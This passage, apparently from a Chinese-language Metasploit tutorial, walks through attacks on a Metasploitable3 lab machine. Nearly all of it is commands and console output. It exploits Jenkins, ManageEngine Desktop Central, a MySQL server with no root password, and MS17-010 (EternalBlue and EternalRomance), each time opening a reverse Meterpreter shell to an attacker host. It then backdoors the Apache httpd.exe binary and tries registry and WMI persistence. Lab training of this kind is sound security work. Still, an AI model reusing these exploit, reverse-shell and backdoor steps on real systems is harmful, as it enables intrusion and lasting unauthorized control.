  4. msf5 exploit(multi/http/jenkins_script_console) > set RPORT 8484
  5. RPORT => 8484
  6. msf5 exploit(multi/http/jenkins_script_console) > set TARGETURI /
  7. TARGETURI => /
  8. msf5 exploit(multi/http/jenkins_script_console) > exploit
  9. [*] Started reverse TCP handler on 192.168.177.143:4444
  10. [*] Checking access to the script console
  11. [*] No authentication required, skipping login...
  12. [*] 192.168.177.144:8484 - Sending command stager...
  13. [*] Command Stager progress - 2.06% done (2048/99626 bytes)
  14. [*] Command Stager progress - 4.11% done (4096/99626 bytes)
  15. [*] Command Stager progress - 6.17% done (6144/99626 bytes)
  16. ....
  17. [*] Command Stager progress - 98.67% done (98304/99626 bytes)
  18. [*] Command Stager progress - 100.00% done (99626/99626 bytes)
  19. [*] Sending stage (179779 bytes) to 192.168.177.144
  20. [*] Meterpreter session 2 opened (192.168.177.143:4444 -> 192.168.177.144:49555) at 2019-04-26 17:32:58 +0800
  21. meterpreter > sysinfo
  22. Computer : METASPLOITABLE3
  23. OS : Windows 2008 R2 (Build 7601, Service Pack 1).
  24. Architecture : x64
  25. System Language : en_US
  26. Domain : WORKGROUP
  27. Logged On Users : 2
  28. Meterpreter : x86/windows
  29. meterpreter > getuid
  30. Server username: NT AUTHORITY\LOCAL SERVICE
  31. meterpreter >
  32. 复制代码

攻击ManageEngine Desktop Central 9

  1. msf5 exploit(multi/http/jenkins_script_console) > search type:exploit Manageengine
  2. Matching Modules
  3. ================
  4. # Name Disclosure Date Rank Check Description
  5. - ---- --------------- ---- ----- -----------
  6. 1 exploit/multi/http/eventlog_file_upload 2014-08-31 excellent Yes ManageEngine Eventlog Analyzer Arbitrary File Upload
  7. 2 exploit/multi/http/manage_engine_dc_pmp_sqli 2014-06-08 excellent Yes ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection
  8. 3 exploit/multi/http/manageengine_auth_upload 2014-12-15 excellent Yes ManageEngine Multiple Products Authenticated File Upload
  9. 4 exploit/multi/http/manageengine_sd_uploader 2015-08-20 excellent Yes ManageEngine ServiceDesk Plus Arbitrary File Upload
  10. 5 exploit/multi/http/manageengine_search_sqli 2012-10-18 excellent Yes ManageEngine Security Manager Plus 5.5 Build 5505 SQL Injection
  11. 6 exploit/multi/http/opmanager_socialit_file_upload 2014-09-27 excellent Yes ManageEngine OpManager and Social IT Arbitrary File Upload
  12. 7 exploit/windows/http/desktopcentral_file_upload 2013-11-11 excellent Yes ManageEngine Desktop Central AgentLogUpload Arbitrary File Upload
  13. 8 exploit/windows/http/desktopcentral_statusupdate_upload 2014-08-31 excellent Yes ManageEngine Desktop Central StatusUpdate Arbitrary File Upload
  14. 9 exploit/windows/http/manage_engine_opmanager_rce 2015-09-14 manual Yes ManageEngine OpManager Remote Code Execution
  15. 10 exploit/windows/http/manageengine_adshacluster_rce 2018-06-28 excellent Yes Manage Engine Exchange Reporter Plus Unauthenticated RCE
  16. 11 exploit/windows/http/manageengine_appmanager_exec 2018-03-07 excellent Yes ManageEngine Applications Manager Remote Code Execution
  17. 12 exploit/windows/http/manageengine_apps_mngr 2011-04-08 average No ManageEngine Applications Manager Authenticated Code Execution
  18. 13 exploit/windows/http/manageengine_connectionid_write 2015-12-14 excellent Yes ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability
  19. 14 exploit/windows/misc/manageengine_eventlog_analyzer_rce 2015-07-11 manual Yes ManageEngine EventLog Analyzer Remote Code Execution
  20. msf5 exploit(multi/http/jenkins_script_console) >
  21. 复制代码
  1. msf5 exploit(multi/http/jenkins_script_console) > use exploit/windows/http/manageengine_connectionid_write
  2. msf5 exploit(windows/http/manageengine_connectionid_write) > set PAYLOAD windows/meterpreter/reverse_http
  3. PAYLOAD => windows/meterpreter/reverse_http
  4. msf5 exploit(windows/http/manageengine_connectionid_write) > set LHOST 192.168.177.143
  5. LHOST => 192.168.177.143
  6. msf5 exploit(windows/http/manageengine_connectionid_write) > exploit
  7. [-] Exploit failed: The following options failed to validate: RHOSTS.
  8. [*] Exploit completed, but no session was created.
  9. msf5 exploit(windows/http/manageengine_connectionid_write) > set RHOSTS 192.168.177.144
  10. RHOSTS => 192.168.177.144
  11. msf5 exploit(windows/http/manageengine_connectionid_write) > exploit
  12. [*] Started HTTP reverse handler on http://192.168.177.143:8080
  13. [*] Creating JSP stager
  14. [*] Uploading JSP stager uBzAP.jsp...
  15. [*] Executing stager...
  16. [*] http://192.168.177.143:8080 handling request from 192.168.177.144; (UUID: tsqgh8zb) Staging x86 payload (180825 bytes) ...
  17. [*] Meterpreter session 3 opened (192.168.177.143:8080 -> 192.168.177.144:49632) at 2019-04-26 17:39:09 +0800
  18. [!] This exploit may require manual cleanup of '../webapps/DesktopCentral/jspf/uBzAP.jsp' on the target
  19. meterpreter >
  20. meterpreter > getuid
  21. Server username: NT AUTHORITY\LOCAL SERVICE
  22. meterpreter > sysinfo
  23. Computer : METASPLOITABLE3
  24. OS : Windows 2008 R2 (Build 7601, Service Pack 1).
  25. Architecture : x64
  26. System Language : en_US
  27. Domain : WORKGROUP
  28. Logged On Users : 2
  29. Meterpreter : x86/windows
  30. meterpreter >
  31. 复制代码

5、利用公用服务

在漏洞攻击时,有些服务跟目标上其他大部分服务都有关系,而大多数是情况下它们被忽视了。

准备工作

在本节中,我们将利用目标环境中最常见和最容易被滥用的服务-Mysql。大多数情况下,我们可以利用Mysql服务,因为它们是出于开发目的安装的。忽略了一些安全加固。比如设置root密码或者设置强密码。

本节我们将使用Metasploitable3作为靶机

怎么做

要利用目标的Mysql服务,我们先使用MySQL枚举模块枚举目标,然后使用Oracle MySQL for the Microsoft Windows Payload攻击模块获取远程主机的shell

TIP:mysql_paylod模块在新版的Metasploit中被移除了。不过你可以从 https://www.exploit-db.com/download/16957下载这个模块,放到Metasploit对应的模块目录中(/usr/share/metasploit-framework/modules/exploits/windows/mysql),修改代码的前面几行为如下内容就行。

  1. ##
  2. # $Id: mysql_payload.rb 11899 2011-03-08 22:42:26Z todb $
  3. ##
  4. ##
  5. # This file is part of the Metasploit Framework and may be subject to
  6. # redistribution and commercial restrictions. Please see the Metasploit
  7. # Framework web site for more information on licensing and terms of use.
  8. # http://metasploit.com/framework/
  9. ##
  10. require 'msf/core'
  11. class MetasploitModule < Msf::Exploit::Remote
  12. Rank = ExcellentRanking
  13. include Msf::Exploit::Remote::MYSQL
  14. include Msf::Exploit::CmdStager
  15. 复制代码

枚举:

  1. msf5 auxiliary(admin/mysql/mysql_enum) > use auxiliary/admin/mysql/mysql_enum
  2. msf5 auxiliary(admin/mysql/mysql_enum) > set RHOSTS 192.168.177.144
  3. RHOSTS => 192.168.177.144
  4. msf5 auxiliary(admin/mysql/mysql_enum) > set USERNAME root
  5. USERNAME => root
  6. msf5 auxiliary(admin/mysql/mysql_enum) > run
  7. [*] Running module against 192.168.177.144
  8. [*] 192.168.177.144:3306 - Running MySQL Enumerator...
  9. [*] 192.168.177.144:3306 - Enumerating Parameters
  10. [*] 192.168.177.144:3306 - MySQL Version: 5.5.20-log
  11. [*] 192.168.177.144:3306 - Compiled for the following OS: Win64
  12. [*] 192.168.177.144:3306 - Architecture: x86
  13. [*] 192.168.177.144:3306 - Server Hostname: metasploitable3
  14. [*] 192.168.177.144:3306 - Data Directory: c:\wamp\bin\mysql\mysql5.5.20\data\
  15. [*] 192.168.177.144:3306 - Logging of queries and logins: OFF
  16. [*] 192.168.177.144:3306 - Old Password Hashing Algorithm OFF
  17. [*] 192.168.177.144:3306 - Loading of local files: ON
  18. [*] 192.168.177.144:3306 - Deny logins with old Pre-4.1 Passwords: OFF
  19. [*] 192.168.177.144:3306 - Allow Use of symlinks for Database Files: YES
  20. [*] 192.168.177.144:3306 - Allow Table Merge:
  21. [*] 192.168.177.144:3306 - SSL Connection: DISABLED
  22. [*] 192.168.177.144:3306 - Enumerating Accounts:
  23. [*] 192.168.177.144:3306 - List of Accounts with Password Hashes:
  24. [+] 192.168.177.144:3306 - User: root Host: localhost Password Hash:
  25. [+] 192.168.177.144:3306 - User: root Host: 127.0.0.1 Password Hash:
  26. [+] 192.168.177.144:3306 - User: root Host: ::1 Password Hash:
  27. [+] 192.168.177.144:3306 - User: Host: localhost Password Hash:
  28. [+] 192.168.177.144:3306 - User: root Host: % Password Hash:
  29. [*] 192.168.177.144:3306 - The following users have GRANT Privilege:
  30. [*] 192.168.177.144:3306 - User: root Host: localhost
  31. [*] 192.168.177.144:3306 - User: root Host: 127.0.0.1
  32. [*] 192.168.177.144:3306 - User: root Host: ::1
  33. [*] 192.168.177.144:3306 - The following users have CREATE USER Privilege:
  34. [*] 192.168.177.144:3306 - User: root Host: localhost
  35. [*] 192.168.177.144:3306 - User: root Host: 127.0.0.1
  36. [*] 192.168.177.144:3306 - User: root Host: ::1
  37. [*] 192.168.177.144:3306 - User: root Host: %
  38. [*] 192.168.177.144:3306 - The following users have RELOAD Privilege:
  39. [*] 192.168.177.144:3306 - User: root Host: localhost
  40. [*] 192.168.177.144:3306 - User: root Host: 127.0.0.1
  41. [*] 192.168.177.144:3306 - User: root Host: ::1
  42. [*] 192.168.177.144:3306 - User: root Host: %
  43. [*] 192.168.177.144:3306 - The following users have SHUTDOWN Privilege:
  44. [*] 192.168.177.144:3306 - User: root Host: localhost
  45. [*] 192.168.177.144:3306 - User: root Host: 127.0.0.1
  46. [*] 192.168.177.144:3306 - User: root Host: ::1
  47. [*] 192.168.177.144:3306 - User: root Host: %
  48. [*] 192.168.177.144:3306 - The following users have SUPER Privilege:
  49. [*] 192.168.177.144:3306 - User: root Host: localhost
  50. [*] 192.168.177.144:3306 - User: root Host: 127.0.0.1
  51. [*] 192.168.177.144:3306 - User: root Host: ::1
  52. [*] 192.168.177.144:3306 - User: root Host: %
  53. [*] 192.168.177.144:3306 - The following users have FILE Privilege:
  54. [*] 192.168.177.144:3306 - User: root Host: localhost
  55. [*] 192.168.177.144:3306 - User: root Host: 127.0.0.1
  56. [*] 192.168.177.144:3306 - User: root Host: ::1
  57. [*] 192.168.177.144:3306 - User: root Host: %
  58. [*] 192.168.177.144:3306 - The following users have PROCESS Privilege:
  59. [*] 192.168.177.144:3306 - User: root Host: localhost
  60. [*] 192.168.177.144:3306 - User: root Host: 127.0.0.1
  61. [*] 192.168.177.144:3306 - User: root Host: ::1
  62. [*] 192.168.177.144:3306 - User: root Host: %
  63. [*] 192.168.177.144:3306 - The following accounts have privileges to the mysql database:
  64. [*] 192.168.177.144:3306 - User: root Host: localhost
  65. [*] 192.168.177.144:3306 - User: root Host: 127.0.0.1
  66. [*] 192.168.177.144:3306 - User: root Host: ::1
  67. [*] 192.168.177.144:3306 - User: root Host: %
  68. [*] 192.168.177.144:3306 - Anonymous Accounts are Present:
  69. [*] 192.168.177.144:3306 - User: Host: localhost
  70. [*] 192.168.177.144:3306 - The following accounts have empty passwords:
  71. [*] 192.168.177.144:3306 - User: root Host: localhost
  72. [*] 192.168.177.144:3306 - User: root Host: 127.0.0.1
  73. [*] 192.168.177.144:3306 - User: root Host: ::1
  74. [*] 192.168.177.144:3306 - User: Host: localhost
  75. [*] 192.168.177.144:3306 - User: root Host: %
  76. [*] 192.168.177.144:3306 - The following accounts are not restricted by source:
  77. [*] 192.168.177.144:3306 - User: root Host: %
  78. [*] Auxiliary module execution completed
  79. msf5 auxiliary(admin/mysql/mysql_enum) >
  80. 复制代码

进行攻击:

  1. msf5> use exploit/windows/mysql/mysql_payload
  2. msf5 exploit(windows/mysql/mysql_payload) > show options
  3. msf5 exploit(windows/mysql/mysql_payload) > set RHOSTS 192.168.177.144
  4. RHOSTS => 192.168.177.144
  5. msf5 exploit(windows/mysql/mysql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
  6. PAYLOAD => windows/meterpreter/reverse_tcp
  7. msf5 exploit(windows/mysql/mysql_payload) > set LHOST 192.168.177.143
  8. LHOST => 192.168.177.143
  9. msf5 exploit(windows/mysql/mysql_payload) > set LPORT 4444
  10. LPORT => 4444
  11. msf5 exploit(windows/mysql/mysql_payload) > exploit
  12. [*] Started reverse TCP handler on 192.168.177.143:4444
  13. [*] 192.168.177.144:3306 - Checking target architecture...
  14. [*] 192.168.177.144:3306 - Checking for sys_exec()...
  15. [*] 192.168.177.144:3306 - sys_exec() already available, using that (override with FORCE_UDF_UPLOAD).
  16. [*] 192.168.177.144:3306 - Command Stager progress - 1.47% done (1499/102246 bytes)
  17. [*] 192.168.177.144:3306 - Command Stager progress - 2.93% done (2998/102246 bytes)
  18. [*] 192.168.177.144:3306 - Command Stager progress - 4.40% done (4497/102246 bytes)
  19. [*] 192.168.177.144:3306 - Command Stager progress - 5.86% done (5996/102246 bytes)
  20. ......
  21. [*] Sending stage (179779 bytes) to 192.168.177.144
  22. [*] 192.168.177.144:3306 - Command Stager progress - 100.00% done (102246/102246 bytes)
  23. [*] Meterpreter session 1 opened (192.168.177.143:4444 -> 192.168.177.144:55358) at 2019-04-26 16:25:45 +0800
  24. meterpreter > getuid
  25. Server username: NT AUTHORITY\SYSTEM
  26. meterpreter >
  27. 复制代码

如果目标Mysql没有设置root密码,因此可以使用 MySQL服务上传shell并获得系统的远程访问权限。就像上面一样。所以,永远不要忘记对基础服务进行渗透测试。即便你认为不会有人傻到配置无密码的服务。

6、MS17-010 永恒之蓝 SMB远程代码执行Windows内核破坏

再次利用在信息收集和扫描阶段收集的信息,特别是MS17-010 SMB RCE检测辅助模块的输出信息,我们可以转向下一个易受攻击的服务。

准备工作

MS17-010 EthernalBlue SMB Remote Windows Kernel Pool Corruption攻击模块是Equation Group ETERNALBLUE的一部分。Equation Group ETERNALBLUEFuzzBunch toolkit的一部分。由Shadow Brokrs从美国国家安全局(NSA)获取并公开。ETERNALBLUE通常被认为是由NSA开发。它利用srv.sys在处理SrvOs2FeaListSizeToNt的时候逻辑不正确导致越界拷贝从而造成缓冲区溢出,进而允许我们执行任意命令。它在被公开后被用在WannaCry勒索软件中进行攻击。此漏洞会影响所有运行SMBv1服务且未更新SMB安全补丁的Windows计算机和Windows服务器。

怎么做

载入ms17_010_eternalblue模块,设置目标IP地址,设置Payload,然后执行攻击

  1. msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.177.144
  2. RHOSTS => 192.168.177.144
  3. msf5 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
  4. PAYLOAD => windows/x64/meterpreter/reverse_tcp
  5. msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.177.143
  6. LHOST => 192.168.177.143
  7. msf5 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 4444
  8. msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
  9. [*] Started reverse TCP handler on 192.168.177.143:4444
  10. [*] 192.168.177.144:445 - Connecting to target for exploitation.
  11. [+] 192.168.177.144:445 - Connection established for exploitation.
  12. [+] 192.168.177.144:445 - Target OS selected valid for OS indicated by SMB reply
  13. [*] 192.168.177.144:445 - CORE raw buffer dump (51 bytes)
  14. [*] 192.168.177.144:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
  15. [*] 192.168.177.144:445 - 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
  16. [*] 192.168.177.144:445 - 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac
  17. [*] 192.168.177.144:445 - 0x00000030 6b 20 31 k 1
  18. [+] 192.168.177.144:445 - Target arch selected valid for arch indicated by DCE/RPC reply
  19. [*] 192.168.177.144:445 - Trying exploit with 12 Groom Allocations.
  20. [*] 192.168.177.144:445 - Sending all but last fragment of exploit packet
  21. [*] 192.168.177.144:445 - Starting non-paged pool grooming
  22. [+] 192.168.177.144:445 - Sending SMBv2 buffers
  23. [+] 192.168.177.144:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
  24. [*] 192.168.177.144:445 - Sending final SMBv2 buffers.
  25. [*] 192.168.177.144:445 - Sending last fragment of exploit packet!
  26. [*] 192.168.177.144:445 - Receiving response from exploit packet
  27. [+] 192.168.177.144:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
  28. [*] 192.168.177.144:445 - Sending egg to corrupted connection.
  29. [*] 192.168.177.144:445 - Triggering free of corrupted buffer.
  30. [*] Meterpreter session 1 opened (192.168.177.143:4444 -> 192.168.177.144:49655) at 2019-04-26 17:40:54 +0800
  31. [+] 192.168.177.144:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  32. [+] 192.168.177.144:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  33. [+] 192.168.177.144:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  34. meterpreter >
  35. meterpreter > sysinfo
  36. Computer : METASPLOITABLE3
  37. OS : Windows 2008 R2 (Build 7601, Service Pack 1).
  38. Architecture : x64
  39. System Language : en_US
  40. Domain : WORKGROUP
  41. Logged On Users : 2
  42. Meterpreter : x64/windows
  43. meterpreter > getuid
  44. Server username: NT AUTHORITY\SYSTEM
  45. meterpreter >
  46. 复制代码

7、MS17-010 EternalRomance/EternalSynergy/EternalChampion

MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution攻击模块也可用于MS17-0101漏洞利用。而且比EnternalBlue更可靠,不过需要命名管道。

怎么做

使用模块ms17_010_psexec

  1. msf5 > use exploit/windows/smb/ms17_010_psexec
  2. msf5 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 192.168.177.144
  3. RHOSTS => 192.168.177.144
  4. msf5 exploit(windows/smb/ms17_010_psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
  5. PAYLOAD => windows/meterpreter/reverse_tcp
  6. msf5 exploit(windows/smb/ms17_010_psexec) > set LHOST 192.168.177.143
  7. LHOST => 192.168.177.143
  8. msf5 exploit(windows/smb/ms17_010_psexec) > exploit
  9. [*] Started reverse TCP handler on 192.168.177.143:4444
  10. [*] 192.168.177.144:445 - Target OS: Windows Server 2008 R2 Standard 7601 Service Pack 1
  11. [*] 192.168.177.144:445 - Built a write-what-where primitive...
  12. [+] 192.168.177.144:445 - Overwrite complete... SYSTEM session obtained!
  13. [*] 192.168.177.144:445 - Selecting PowerShell target
  14. [*] 192.168.177.144:445 - Executing the payload...
  15. [+] 192.168.177.144:445 - Service start timed out, OK if running a command or non-service executable...
  16. [*] Sending stage (179779 bytes) to 192.168.177.144
  17. [*] Meterpreter session 2 opened (192.168.177.143:4444 -> 192.168.177.144:62432) at 2019-04-28 09:37:48 +0800
  18. meterpreter > getuid
  19. Server username: NT AUTHORITY\SYSTEM
  20. meterpreter > sysinfo
  21. Computer : METASPLOITABLE3
  22. OS : Windows 2008 R2 (Build 7601, Service Pack 1).
  23. Architecture : x64
  24. System Language : en_US
  25. Domain : WORKGROUP
  26. Logged On Users : 2
  27. Meterpreter : x86/windows
  28. meterpreter >
  29. 复制代码

8、安装后门

获取shell后,我们如果需要确保能持久性的访问目标系统,我们需要安装后门。

准备工作

通过之前的漏洞利用,我们已经获得了与目标机的session,我们将利用meterpreter session来安装后门服务。这里以httpd.exe为例。

  1. meterpreter > ps -S httpd.exe
  2. Filtering on 'httpd.exe'
  3. Process List
  4. ============
  5. PID PPID Name Arch Session User Path
  6. --- ---- ---- ---- ------- ---- ----
  7. 1304 1816 dcserverhttpd.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\ManageEngine\DesktopCentral_Server\apache\bin\dcserverhttpd.exe
  8. 1816 472 dcserverhttpd.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\ManageEngine\DesktopCentral_Server\apache\bin\dcserverhttpd.exe
  9. 3180 472 httpd.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\wamp\bin\apache\Apache2.2.21\bin\httpd.exe
  10. 3880 3180 httpd.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\wamp\bin\apache\Apache2.2.21\bin\httpd.exe
  11. meterpreter >
  12. 复制代码

接下来,我们将利用windows注册表持久性模块安装随系统启动的后门。

最后我们将利用WMI( Windows Management Instrumentation )创建一个无文件后门。

怎么做

1、不能在程序运行的时候安装后门,所以先杀死进程

  1. meterpreter > kill 3880
  2. Killing: 3880
  3. meterpreter >
  4. 复制代码

2、将需要替换成后门的程序下载下来

  1. meterpreter > download C:\\wamp\\bin\\apache\\apache2.2.21\\bin\\httpd.exe
  2. [*] Downloading: C:\wamp\bin\apache\apache2.2.21\bin\httpd.exe -> httpd.exe
  3. [*] Downloaded 21.00 KiB of 21.00 KiB (100.0%): C:\wamp\bin\apache\apache2.2.21\bin\httpd.exe -> httpd.exe
  4. [*] download : C:\wamp\bin\apache\apache2.2.21\bin\httpd.exe -> httpd.exe
  5. meterpreter >
  6. 复制代码

3、将会话退回到后台,使用reverse_tcp攻击载荷,使用generate生成后门文件。

  1. msf5 exploit(windows/smb/ms17_010_psexec) > use payload/windows/x64/meterpreter/reverse_tcp
  2. msf5 payload(windows/x64/meterpreter/reverse_tcp) > set LHOST 192.168.177.143
  3. LHOST => 192.168.177.143
  4. msf5 payload(windows/x64/meterpreter/reverse_tcp) > generate -p Windows -x /root/httpd.exe -k -f exe -o /root/httpd-backdoored.exe
  5. [*] Writing 29184 bytes to /root/httpd-backdoored.exe...
  6. msf5 payload(windows/x64/meterpreter/reverse_tcp) >
  7. 复制代码

关于generate的参数说明,可以查看帮助信息

  1. msf5 payload(windows/x64/meterpreter/reverse_tcp) > generate -h
  2. Usage: generate [options]
  3. Generates a payload.
  4. OPTIONS:
  5. -E Force encoding
  6. -O <opt> Deprecated: alias for the '-o' option
  7. -P <opt> Total desired payload size, auto-produce approproate NOPsled length
  8. -S <opt> The new section name to use when generating (large) Windows binaries
  9. -b <opt> The list of characters to avoid example: '\x00\xff'
  10. -e <opt> The encoder to use
  11. -f <opt> Output format: bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,axis2,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,jar,jsp,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-cmd,psh-net,psh-reflection,vba,vba-exe,vba-psh,vbs,war
  12. -h Show this message
  13. -i <opt> The number of times to encode the payload
  14. -k Preserve the template behavior and inject the payload as a new thread
  15. -n <opt> Prepend a nopsled of [length] size on to the payload
  16. -o <opt> The output file name (otherwise stdout)
  17. -p <opt> The platform of the payload
  18. -s <opt> NOP sled length.
  19. -x <opt> Specify a custom executable file to use as a template
  20. 复制代码

4、启动一个监听,监听后门的反向连接,并使用expolit -j放到后台运行

  1. msf5 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/multi/handler
  2. msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
  3. payload => windows/x64/meterpreter/reverse_tcp
  4. msf5 exploit(multi/handler) > set LHOST 192.168.177.143
  5. LHOST => 192.168.177.143
  6. msf5 exploit(multi/handler) > exploit -j
  7. [*] Exploit running as background job 0.
  8. [*] Exploit completed, but no session was created.
  9. [*] Started reverse TCP handler on 192.168.177.143:4444
  10. msf5 exploit(multi/handler) >
  11. 复制代码

5、切回之前的meterpreter session,上传后门文件并重命名。

  1. msf5 exploit(multi/handler) > sessions -i 3
  2. [*] Starting interaction with 3...
  3. meterpreter > cd C:\\wamp\\bin\\apache\\apache2.2.21\\bin\\
  4. meterpreter > mv httpd.exe httpd.exe.backup
  5. meterpreter > upload /root/httpd-backdoored.exe
  6. [*] uploading : /root/httpd-backdoored.exe -> httpd-backdoored.exe
  7. [*] Uploaded 28.50 KiB of 28.50 KiB (100.0%): /root/httpd-backdoored.exe -> httpd-backdoored.exe
  8. [*] uploaded : /root/httpd-backdoored.exe -> httpd-backdoored.exe
  9. meterpreter > mv httpd-backdoored.exe httpd.exe
  10. meterpreter >
  11. 复制代码

6、使用shell命令进入目标系统的shell,重启wampapache服务。

  1. meterpreter > shell
  2. Process 1976 created.
  3. Channel 3 created.
  4. Microsoft Windows [Version 6.1.7601]
  5. Copyright (c) 2009 Microsoft Corporation. All rights reserved.
  6. C:\wamp\bin\apache\apache2.2.21\bin>net stop wampapache
  7. net stop wampapache
  8. The wampapache service is stopping.net sta
  9. The wampapache service was stopped successfully.
  10. C:\wamp\bin\apache\apache2.2.21\bin>net start wampapache
  11. [*] Sending stage (206403 bytes) to 192.168.177.144
  12. net start wampapache
  13. The wampapache service is starting.
  14. The wampapache service was started successfully.
  15. 复制代码

你会发现,服务启动后,返回了新的会话

  1. C:\wamp\bin\apache\apache2.2.21\bin>[*] Meterpreter session 4 opened (192.168.177.143:4444 -> 192.168.177.144:63068) at 2019-04-28 10:32:44 +0800
  2. [*] Sending stage (206403 bytes) to 192.168.177.144
  3. [*] Meterpreter session 5 opened (192.168.177.143:4444 -> 192.168.177.144:63069) at 2019-04-28 10:32:59 +0800
  4. ....
  5. msf5 exploit(multi/handler) > sessions -l
  6. Active sessions
  7. ===============
  8. Id Name Type Information Connection
  9. -- ---- ---- ----------- ----------
  10. 3 meterpreter x86/windows NT AUTHORITY\SYSTEM @ METASPLOITABLE3 192.168.177.143:4444 -> 192.168.177.144:62506 (192.168.177.144)
  11. 4 meterpreter x64/windows NT AUTHORITY\LOCAL SERVICE @ METASPLOITABLE3 192.168.177.143:4444 -> 192.168.177.144:63068 (192.168.177.144)
  12. 5 meterpreter x64/windows NT AUTHORITY\LOCAL SERVICE @ METASPLOITABLE3 192.168.177.143:4444 -> 192.168.177.144:63069 (192.168.177.144)
  13. msf5 exploit(multi/handler) >
  14. 复制代码

7、使用Windows注册表持久化模块植入后门。我们利用永恒之蓝攻击获得的会话进行后门植入操作。

  1. msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/local/registry_persistence
  2. smsf5 exploit(windows/local/registry_persistence) > set SESSION 6
  3. SESSION => 6
  4. msf5 exploit(windows/local/registry_persistence) > set PAYLOAD windows/meterpreter/reverse_tcp
  5. PAYLOAD => windows/meterpreter/reverse_tcp
  6. msf5 exploit(windows/local/registry_persistence) > set LHOST 192.168.177.143
  7. LHOST => 192.168.177.143
  8. msf5 exploit(windows/local/registry_persistence) > set LPORT 9999
  9. msf5 exploit(windows/local/registry_persistence) > exploit
  10. [*] Generating payload blob..
  11. [+] Generated payload, 5944 bytes
  12. [*] Root path is HKCU
  13. [*] Installing payload blob..
  14. [+] Created registry key HKCU\Software\cPH3pG4G
  15. [+] Installed payload blob to HKCU\Software\cPH3pG4G\q3jhQYTs
  16. [*] Installing run key
  17. [-] Exploit aborted due to failure: unknown: Could not install run key
  18. msf5 exploit(windows/local/registry_persistence) >
  19. 复制代码

这里因为环境问题,并未植入成功。

8、如果成功,然后就可以设置监听,以便目标重启的时候获得反向shell会话

  1. msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
  2. PAYLOAD => windows/meterpreter/reverse_tcp
  3. msf5 exploit(multi/handler) > set LHOST 192.168.177.143
  4. LHOST => 192.168.177.143
  5. msf5 exploit(multi/handler) > set LPORT 9999
  6. LPORT => 9999
  7. msf5 exploit(multi/handler) > exploit -j
  8. [*] Exploit running as background job 1.
  9. [*] Exploit completed, but no session was created.
  10. [*] Started reverse TCP handler on 192.168.177.143:9999
  11. msf5 exploit(multi/handler) >
  12. 复制代码

9、当目标机器重启后,可以获得会话

  1. meterpreter > reboot
  2. Rebooting...
  3. 复制代码

10、利用WMI事件订阅创建无文件后门

  1. msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/local/wmi_persistence
  2. msf5 exploit(windows/local/wmi_persistence) > set SESSION 1
  3. SESSION => 1
  4. msf5 exploit(windows/local/wmi_persistence) > set CALLBACK_INTERVAL 60000 //设置回调时间为1分钟
  5. CALLBACK_INTERVAL => 60000
  6. msf5 exploit(windows/local/wmi_persistence) > set EVENT_ID_TRIGGER 4624 //设置事件ID
  7. EVENT_ID_TRIGGER => 4624
  8. msf5 exploit(windows/local/wmi_persistence) > set USERNAME_TRIGGER Administrator //设置用户
  9. USERNAME_TRIGGER => Administrator
  10. msf5 exploit(windows/local/wmi_persistence) > set PAYLOAD windows/meterpreter/reverse_tcp
  11. PAYLOAD => windows/meterpreter/reverse_tcp
  12. smsf5 exploit(windows/local/wmi_persistence) > set LHOST 192.168.177.143
  13. LHOST => 192.168.177.143
  14. msf5 exploit(windows/local/wmi_persistence) > set LPORT 4433
  15. LPORT => 4433
  16. msf5 exploit(windows/local/wmi_persistence) > exploit
  17. [-] This module cannot run as System
  18. 复制代码

11、提示未成功,我们可以使用migratemeterpreter shell进程进行进程迁移,就是将meterpreter shell进程迁移到相对稳定应用的进程里。

  1. msf5 exploit(windows/local/wmi_persistence) > sessions -i 1
  2. [*] Starting interaction with 1...
  3. meterpreter > ps
  4. Process List
  5. ============
  6. PID PPID Name Arch Session User Path
  7. --- ---- ---- ---- ------- ---- ----
  8. 0 0 [System Process]
  9. 4 0 System x64 0
  10. 232 4 smss.exe x64 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
  11. 300 472 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
  12. 316 304 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
  13. 324 5624 explorer.exe x64 1 METASPLOITABLE3\vagrant C:\Windows\Explorer.EXE
  14. .....
  15. meterpreter > migrate -N explorer.exe //进程迁移不一定每次都能成功,可以多试几次
  16. [*] Migrating from 1088 to 5624...
